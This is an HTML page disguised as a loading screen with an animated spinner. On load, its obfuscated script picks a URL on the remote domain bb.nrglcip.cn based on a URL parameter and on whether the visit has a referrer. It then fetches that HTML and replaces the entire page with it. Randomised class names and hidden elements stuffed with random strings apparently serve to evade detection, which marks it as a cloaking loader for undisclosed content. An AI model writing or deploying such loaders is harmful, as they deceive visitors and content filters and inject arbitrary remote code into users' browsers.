<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .NjDJQJf {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .NjDJQJf .KaZJyAM2e {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .NjDJQJf .content {
            line-height: 50px;
            text-align: center
        }

        .NjDJQJf .img {
            width: 100%
        }

        .NjDJQJf .hSJRAmD {
            text-align: center
        }

        .NjDJQJf .hSJRAmD span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .NjDJQJf .hSJRAmD span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .NjDJQJf .hSJRAmD span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .NjDJQJf .hSJRAmD span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .NjDJQJf .hSJRAmD span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .NjDJQJf .hSJRAmD span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .NjDJQJf .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function J17Ks5jfGbT(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var zD2zj = J17Ks5jfGbT('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ zD2zj +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ zD2zj +".html?a=share";
		}
		
        BRIdNTlSX=url+"#"+new Date().getTime();
        BRIdNTlSX && function() {
            $.get(BRIdNTlSX, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<li style='display:none' >jiH1L6PbV6FpyHMsi88mQCoflkvEx</li>
<span style='display:none'>EzcHHNzSkvphABxmKh7saHGA9cjN0ZUUjP7zog1ujepw</span>
<a  href='#' style='display:none'>Ejf4mCEMCDslixVHSwoz6Pqg</a>
<h1 style='display:none' >SElXxBlthlyE</h1>
<span style='display:none'>EzcHHNzSkvphABxmKh7saHGA9cjN0ZUUjP7zog1ujepw</span>
<h1 style='display:none' >SElXxBlthlyE</h1>
<a  href='#' style='display:none'>Ejf4mCEMCDslixVHSwoz6Pqg</a>
<img  src='' style='display:none'><div class="NjDJQJf">
    <div class="KaZJyAM2e">
        <div class="hSJRAmD">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<ul style='display:none' >rcV8v0I8gjYJbXt1PBTAZtD4o</ul>
<img  src='' style='display:none'>
<h1 style='display:none' >mTe31RG3vz8yJ2dpWqFkuTyxw70Fg0B9oE3uMQM78GLgVZ256blcsMx6sfjnw31oVH</h1></body>
</html>